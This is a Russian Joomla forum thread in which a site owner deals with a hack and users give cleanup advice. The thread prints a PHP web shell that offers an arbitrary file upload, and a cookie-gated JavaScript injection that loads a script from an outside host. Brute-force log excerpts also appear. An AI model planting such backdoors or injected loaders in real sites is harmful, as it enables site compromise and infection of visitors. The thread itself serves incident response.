0 Пользователей и 1 Гость просматривают эту тему.
  • 45 Ответов
  • 2990 Просмотров
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
Никто не сталкивался? Сайт взломали, случайно обнаружил файл (krd.html) в корне следующего содержания:

HaCkeD By MuhmadEmad
Long Live to peshmarga
kurdlinux007@gmail.com
*** ISIS !

Может кто знает как бороться? 
Joomla стоит 3.4.7

Так же в корне еще находится файл (apis.php) сожержание:

<?
error_reporting(0);
if(isset($_GET[sdbu]))
   {
      echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]<br>";
      echo "<font color=#FFFFFF>[pwd]".getcwd()."[/pwd]<br>";
      print "\n";$disable_functions = @ini_get("disable_functions");
      echo "DisablePHP=".$disable_functions; print "<br>";
      echo"<form method=post enctype=multipart/form-data>";
      echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
        if($_POST["v"]==up)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} 
{ if(@copy($_FILES["emad"]["tmp_name"],$_FILES["emad"]["name"])){echo"<b></b>-->".$_FILES["emad"]["name"];}else{echo"<b>";}}}
?>
*

wishlight

  • Живу я здесь
  • 4872
  • 285 / 1
  • 300 руб очень быстрый хостинг в ЕС
http://joomlaforum.ru/index.php/board,104.0.html в основном разделе полно рекомендаций. Советую воспользоватся сканером ai-bolit поле обновления всего, что возможно на сайте.
*

winstrool

  • Давно я тут
  • 814
  • 51 / 2
  • Свободен для работы
Joomla стоит 3.4.7
Бывает, что шелы на сайтах месяцами-годами лежат, а юзаются по мере необходимости, эта ветка версии недавно с фиксами вышла, шелы наверняка уже до нее были, более того, на сегодняшний день уже есть https://www.joomla.org/announcements/release-news/5644-joomla-3-4-8-released.html - Joomla 3.4.8
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
http://joomlaforum.ru/index.php/board,104.0.html в основном разделе полно рекомендаций. Советую воспользоватся сканером ai-bolit поле обновления всего, что возможно на сайте.
Сканировал ai-bolit'ом еще до установки различных модулей...отсылал результат Земскову - ответил, что все Ок


елы на сайтах месяцами-годами лежат, а юзаются по мере необходимости, эта ветка версии недавно с фиксами вышла, шелы наверняка уже до нее были, более того, на сегодняшний день уже есть https://www.joomla.org/announcements/release-news/5644-joomla-3-4-8-released.html - Joomla 3.4.8

Угу, обновляюсь
*

winstrool

  • Давно я тут
  • 814
  • 51 / 2
  • Свободен для работы
Сканировал ai-bolit'ом еще до установки различных модулей...отсылал результат Земскову - ответил, что все Ок
ai-bolit - это одно из решений к комплексному подходу, второй момент просто также шелл не оказался же.... может это и просто в качестве бегдора лежал, но еще не использовался, в любом случае имеет смысл подумать по усилению защиты сайта, дабы избежать подобных рисков заражения.
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Мне так кажется, что простого обновления не достаточно. Нужно вылечить сайт, а потом уже обновлять.
скачайте сайт на комп и  поиском по файлам в нотепаде ищите упоминания о подозрительных строчках, чистите и заливайте обратно сайт. В каждой папке нужно проверить и сравнить с дистрибьютором на наличие лишних/подозрительных и сносить. А потом уже обновлять на чистом сайте.
Я свой так и вылечила на 1.5 когда то) Айболитом мне ничего не показывало, а Яндекс и Google заблочили, пришлось самой копать.
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
ai-bolit - это одно из решений к комплексному подходу, второй момент просто также шелл не оказался же.... может это и просто в качестве бегдора лежал, но еще не использовался, в любом случае имеет смысл подумать по усилению защиты сайта, дабы избежать подобных рисков заражения.
Спасибо, сканирую повторно

>>Мне так кажется, что простого обновления не достаточно. Нужно вылечить сайт, а потом уже обновлять.
Как бы, не могу понять от чего лечить. файлы шелла - удалил. В корне и в папке tmp.
Меня больше интересует, а как можно проанализировать, может это брутфорс? Как-то можно отследить количество попыток ввода пароля для ftp?
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
В папке log, есть файл error.php В нем 20 тысяч запросов вида:

2015-11-17T05:55:13+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:19+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:24+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:28+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
*

SeBun

  • Живу я здесь
  • 3959
  • 254 / 4
  • @SeBun48
В папке log, есть файл error.php В нем 20 тысяч запросов вида:

2015-11-17T05:55:13+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
Похоже на брут.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

winstrool

  • Давно я тут
  • 814
  • 51 / 2
  • Свободен для работы
Да, там ведутся записи, о не верной аутентификации, админку нужно дополнительно защищать!
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
Первая запись от 04.11 последняя от 29.12...вчера и обнаружил файл. Это чего, меня пытались взломать полтора месяца?)
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Как бы, не могу понять от чего лечить. файлы шелла - удалил. В корне и в папке tmp.
Меня больше интересует, а как можно проанализировать, может это брутфорс? Как-то можно отследить количество попыток ввода пароля для ftp?

Определить можно по лог файлам, с каких IP заходили, учше попросить хостеров чтобы вытащили.

Простого удаления сторонних файлов не достаточно, нужно так же вычистить и файлы в которые был добавлен код.
В моём случае, были заражены js файлы ( 749  файлов)

во всех файлах этих был код:

Код
function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');}

Все зараженные файлы я тут нашла: http://antivirus-alarm.ru/
После чистки и перепроверки, показало что всё чисто, Яндекс и Google разбанили тоже.
*

SeBun

  • Живу я здесь
  • 3959
  • 254 / 4
  • @SeBun48
Определить можно по лог файлам, с каких IP заходили...
Что бы понять, как действует взломщик, нужно самому быть немного хакером и знать механизмы получения доступа к сайту, а их довольно много. Логи при этом могут не всегда вестись. Например, если выполняется SQL-инъект.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
Проверил http://antivirus-alarm.ru/ пока все чисто.
Модификации файлов, можно отследить по их последнему изменению?
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
Что бы понять, как действует взломщик, нужно самому быть немного хакером и знать механизмы получения доступа к сайту, а их довольно много. Логи при этом могут не всегда вестись. Например, если выполняется SQL-инъект.
Я пока смотрю...в сторону плагинов которые помогут отследить это
*

winstrool

  • Давно я тут
  • 814
  • 51 / 2
  • Свободен для работы
Проверил http://antivirus-alarm.ru/ пока все чисто.
Модификации файлов, можно отследить по их последнему изменению?
Если взломщик не менял то да, но опытные меняют, у файлов есть три атрибута даты, дата создания, дата изминения и дата доступа(вроде так...), вы в своих панелях, как правило, видите только дату изменения, которую можно поправить функцией touch();

Чтобы вообще понять некоторые аспекты уязвимости сайтов и серваков, залейте сами к себе на сайт WSO shell (как пример) и по изучайте возможности того, чего вы сможете сделать если вы внутри, и что вам вообще нужно сделать чтоб избежать этого, по изучайте различные варианты бегдоров, посмотрите как они работают, попробуйте написать свои варианты, это вам поможет понять общею философию сего дела.
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Мне тут видео скинули, как шелл заливают. Руки бы оторвала.

https://www.youtube.com/watch?v=UBdYoIiX0mA
*

SeBun

  • Живу я здесь
  • 3959
  • 254 / 4
  • @SeBun48
Мне тут видео скинули, как шелл заливают. Руки бы оторвала.
Нужно не руки отрывать, а учиться элементарным правилам безопасности. Почитайте...
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

winstrool

  • Давно я тут
  • 814
  • 51 / 2
  • Свободен для работы
Мне тут видео скинули, как шелл заливают. Руки бы оторвала.

https://www.youtube.com/watch?v=UBdYoIiX0mA
... да на твоем видео еще и ядро рутабельное, что может привести к рууту всего хостинга!...

Отрывай  :laugh: :laugh: :laugh:
https://forum.antichat.ru/threads/398859/

P.S: Меня честно иногда удивляет, когда люди лезут в защиту и лечения сайтов, не понимая техник, методик взлома и троянизации систем.
« Последнее редактирование: 30.12.2015, 11:43:44 от winstrool »
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
В соседней ветке есть цитата:

Цитировать
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Данные логи нужно просить у хостера?
*

winstrool

  • Давно я тут
  • 814
  • 51 / 2
  • Свободен для работы
Все проси, все пригодятся, если умеешь анализировать, а если нет, то толку не будет...
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?
*

winstrool

  • Давно я тут
  • 814
  • 51 / 2
  • Свободен для работы
Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?
Сначала в центральной панели хостинга, а потом в configuration.php
*

wishlight

  • Живу я здесь
  • 4872
  • 285 / 1
  • 300 руб очень быстрый хостинг в ЕС
Там данные доступа меняются. А сам пароль через панель управления или консоль. Если вы уже сменили пароль к пользователю базы данных, то да в configuration.php пишутся новые данные.
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?

И не только там, знаю дурная привычка, ftp оставлять, поработал, удалить доступ.
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
Сменил через консоль а :) configuration.php не дает редактировать по ftp) Где меняются привилегии?
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
Ага все изменил...) спасибо
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Папку администратора закройте, если еще не закрыли, с помощью http авторизации
*

Serebro2009

  • Захожу иногда
  • 109
  • 0 / 0
Ага, читаю как сделать это. Спасибо за совет
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Ага, читаю как сделать это. Спасибо за совет
на хостинге в менеджере файлов или еще где есть сейчас практически везде "ограничения на папку" называется, там указываете папку и логин и пас для пользователя вписываете и автоматом все нужные файлы создаются
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 200
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 379
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 3986
Последний ответ 08.01.2020, 12:52:55
от winstrool
Реклама (взломали сайт)

Автор Emusarce

Ответов: 15
Просмотров: 936
Последний ответ 18.01.2019, 10:41:27
от ProtectYourSite
Можно ли защитить сайт от инъекций в файлы без обновления Joomla и расширений?

Автор borro

Ответов: 6
Просмотров: 1061
Последний ответ 09.11.2018, 18:36:44
от winstrool